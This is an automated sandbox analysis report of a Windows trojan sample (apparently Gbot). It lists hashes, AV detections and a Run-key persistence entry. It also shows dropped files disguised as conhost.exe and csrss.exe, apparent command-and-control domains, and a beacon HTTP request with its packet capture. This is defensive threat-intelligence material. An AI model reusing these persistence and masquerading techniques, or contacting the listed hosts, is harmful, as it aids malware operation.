Analysis Date2013-10-29 02:39:10
MD5b26504139f8143197e998cfec587af71
SHA170715a76466b002bd44202e921af643b32de0d10

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386
Section.text md5: e7d2da57ab37aa2e7f42f41b1cd5d149 sha1: 919fc716ff60699a4c7ea7867ebbc285f8390fde size: 98304
Section.rdata md5: a8abb2f5d7874802fb06b39bbee99b2d sha1: dcaf0f7ae20b2edbf730c94956314d1641ab39f8 size: 2048
Section.data md5: e0cbbb64bef369c6d51865aa27cc1a16 sha1: 3101bf7e3e8d37139d6b1a62db9b58ce583c01e1 size: 56832
Section.isete md5: 1f560b62ecea77dfd6a07a06d455eda7 sha1: 198a10cf9db48a57f069afe7decdb78ba1144b94 size: 1024
Timestamp2005-09-25 20:01:07
VersionProductVersion: 1.0.0.3
FileVersion: 1.0.0.3
PrivateBuild: 1396
PEhash9021b689d047875c82a423fa3103609c598e866d
AVaviraBDS/Gbot.aida
AVavgCryptic.DSK
AVclamavTrojan.Agent-210246

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
1
RegistryHKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\conhost ➝
C:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FilePIPE\lsarpc
Creates FileC:\Documents and Settings\Administrator\Application Data\75DE.FFC
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe
Creates ProcessC:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe%C:\Documents and Settings\Administrator\Local Settings\Temp
Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe
Creates ProcessC:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data
Creates Mutex{A5B35993-9674-43cd-8AC7-5BC5013E617B}
Creates MutexWininetConnectionMutex
Creates Mutexc:!documents and settings!administrator!cookies!
Creates Mutex{61B98B86-5F44-42b3-BCA1-33904B067B81}
Creates Mutex{7791C364-DE4E-4000-9E92-9CCAFDDD90DC}
Creates Mutexc:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex{B37C48AF-B05C-4520-8B38-2FE181D5DC78}
Creates Mutexc:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Winsock DNSbigmusicarchive.com
Winsock DNSfolusho.com
Winsock DNS127.0.0.1
Winsock DNSmoremobileringtons.com

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data

Creates ProcessC:\Documents and Settings\Administrator\Application Data\dwm.exe

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe%C:\Documents and Settings\Administrator\Local Settings\Temp

Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe

Network Details:

DNSfolusho.com
Type: A
67.222.55.143
DNSmoremobileringtons.com
Type: A
DNSbigmusicarchive.com
Type: A
HTTP GEThttp://folusho.com/wp-content/uploads/2010/09/web-20-what-is-300x251.jpg?v86=33&tq=gHZutDyMv5rJeTbia9nrmsl6giWz%2BJZbVyA%3D
User-Agent: mozilla/2.0
Flows TCP192.168.1.1:1031 ➝ 67.222.55.143:80

Raw Pcap
0x00000000 (00000)   47455420 2f77702d 636f6e74 656e742f   GET /wp-content/
0x00000010 (00016)   75706c6f 6164732f 32303130 2f30392f   uploads/2010/09/
0x00000020 (00032)   7765622d 32302d77 6861742d 69732d33   web-20-what-is-3
0x00000030 (00048)   30307832 35312e6a 70673f76 38363d33   00x251.jpg?v86=3
0x00000040 (00064)   33267471 3d67485a 75744479 4d763572   3&tq=gHZutDyMv5r
0x00000050 (00080)   4a655462 6961396e 726d736c 36676957   JeTbia9nrmsl6giW
0x00000060 (00096)   7a253242 4a5a6256 79412533 44204854   z%2BJZbVyA%3D HT
0x00000070 (00112)   54502f31 2e300d0a 436f6e6e 65637469   TP/1.0..Connecti
0x00000080 (00128)   6f6e3a20 636c6f73 650d0a48 6f73743a   on: close..Host:
0x00000090 (00144)   20666f6c 7573686f 2e636f6d 0d0a4163    folusho.com..Ac
0x000000a0 (00160)   63657074 3a202a2f 2a0d0a55 7365722d   cept: */*..User-
0x000000b0 (00176)   4167656e 743a206d 6f7a696c 6c612f32   Agent: mozilla/2
0x000000c0 (00192)   2e300d0a 0d0a                         .0....


Strings
040904b0
1.0.0.3
1396
&21Q
 2#q
2QP3
aA"0
aGEr
aPdz
B3%3
bAE0
FileVersion
#gP%
 gQ$
jjjjjj
p DA
PrivateBuild
ProductVersion
"Q2c
Q@c!
R1d0
StringFileInfo
TIMES NEW ROMAN
Translation
VarFileInfo
VS_VERSION_INFO
+"[ <&
<0tbyst
13o?^Au
/1prP+
2c,pO"
2G8wsH
2IZX!A
"2|&|W
32nlllh
35?n	-
$.3HM:.
$3%j4U
3^M*RX=
3n	w*H
43c,08A
:45n\H
!(4Dk'%
4_K1j%h
4MTL<(
/4Xh<BODY
4Zc M+
544K-?
5c5(th
=6$1"k
-67bl.
,71@8v
+$83*?
85Og{^0
87tv'b
8U3l5L
95D5'bm
99jW(Tj
9bkL8Hp
9[+~M[
9@_*QA
	A7<DA
A8\#^M'PE
AddFontResourceExW
ADVAPI32.dll
alse"><
`at!lB
a)	Xgs
.B9Mc~
'BG=G0
BhA8C!
BMf'!kN
C7CF0'd
CBc499c
CharNextW
CharUpperW
C:^iBm
cL$	"j
CoCreateInstance
CoInitialize
CoRegisterClassObject
CoRevokeClassObject
CoTaskMemAlloc
CoTaskMemFree
CoTaskMemRealloc
CoUninitialize
CreateFileMappingW
CreateFontIndirectW
CreateStdAccessibleObject
Ctt@KpeF9
d%0T0#Z
@.data
dcMts=
DeleteObject
DispatchMessageW
d]|-jz
/dll:ol
)d~:m8
"d~OB$
DssWAoRy
dtn__^
dwt]h1
,E0/[X
E6l^v;
[ek-C(
|el`tev
EnumResourceNamesW
EViOI3
f[&Cg_i
"f>>DM5
F+eCj?"U
FillConsoleOutputAttribute
FindClose
-fj>:#
fLgHK51
<fm]-L2eE
+FPz.q
FreeEnvironmentStringsW
fr'smY
Ft[53S
gCBIu&
GDI32.dll
GetACP
GetCPInfo
GetLastError
GetMessageW
GetModuleHandleW
GetOutlineTextMetricsW
GetProcessMemoryInfo
GetProcessPriorityBoost
GetTextMetricsW
GetTickCount
GetWindowLongA
gG-,;Q
g{HvW|vC
GlobalAlloc
GlobalFree
gs=eic
  `h3/KgcuJkty
[h50(CV
h:a3h.v
h@h,($
h;j3wE
Ht	Me1a
I32.dll:SHmGP3Jjdl
.%I$ATS.
ifMqtVUjsi
Ii;^T$
`I]lde
InitializeCriticalSection
INPRTP>
INqKETF
.isete
ItSR<_D
I	W5I3t
J+3T+l
}:j@bUE
JtMxWHXu&
;jYB,h
K2MsW]
K8F>6ow
K{&dy?h
KERNEL32.dll
$<KfcuJjty
Kf"Kt/
KillTimer
ko1Q=+
ksovl-c
k(W2ED
l0@(,k7D
LiRpar
LJL>?	w
LockResource
L-oQ "
LresultFromObject
lstrcmpiW
lstrcpyA
lstrcpyW
lstrlenW
l	T~%l
LYO%gKv
m4is="/qn
!m/9[:
"M;.9;
m-,^}c
/mMiIVP
mtP2jcA
MultiByteToWideChar
N5E^4n
)N9::d
nbf7ra&u
neD4\~
n @pln
NSQA3xir
Nx^7+w
NX(JAI
o'8g~-U
O	+D1(
OD|KYL
>O J\0
[O~(L%
ole32.dll
OLEACC.dll
@Oojdd
OutputDebugStringW
oyA+bOBC
p3"	oInNnmeB
PostThreadMessageW
]Pr r8b
PSAPI.DLL
|PU7<j4
&puuotetLri
_q68R,
q:s[iem
`.rdata
Re>`3@B:4Hl
RegCloseKey
RegCreateKeyExW
RegDeleteKeyW
RegDeleteValueW
RegEnumKeyExW
RegOpenKeyExW
RegQueryInfoKeyW
RegSetValueExW
R}G28A
|rn;dpC
rs-nblA?PA
rSu h3
RYa1'F
S2732.Lil
SelectObject
SetTimer
SHELL32.dll
SHGetFileInfoW
|SH|OAPq)dl4
SMf"s!
StringFromCLSID
StringFromGUID2
stUeExm`ttQlnL
T5,.")
t7w]hU
!This program cannot be run in DOS mode.
Tlt'Rp
t.o8Awnt
TranslateMessage
}`u7Zj
=}uAaV
UnregisterClassA
ur5ntI
":U,r ?u`$
USER32.dll
VD()}E"
V,E>7D
VOS\p H\RP/
v;p$d;?
-V Toxor
VuYwpuU
W%)3)A
wGu;qws
WideCharToMultiByte
WieGMf
)W;Rx6X
@	ws0min<
wS]iv9P4t
wsprintfW
w#"VL!
W;Vr+W
@w&wPSs
Xd6_79
XMS O<u
xX9u: 
y-8W>V
YB[=CF
Y]@$co.
?($Z'\
ze@	RaK
Zne5PS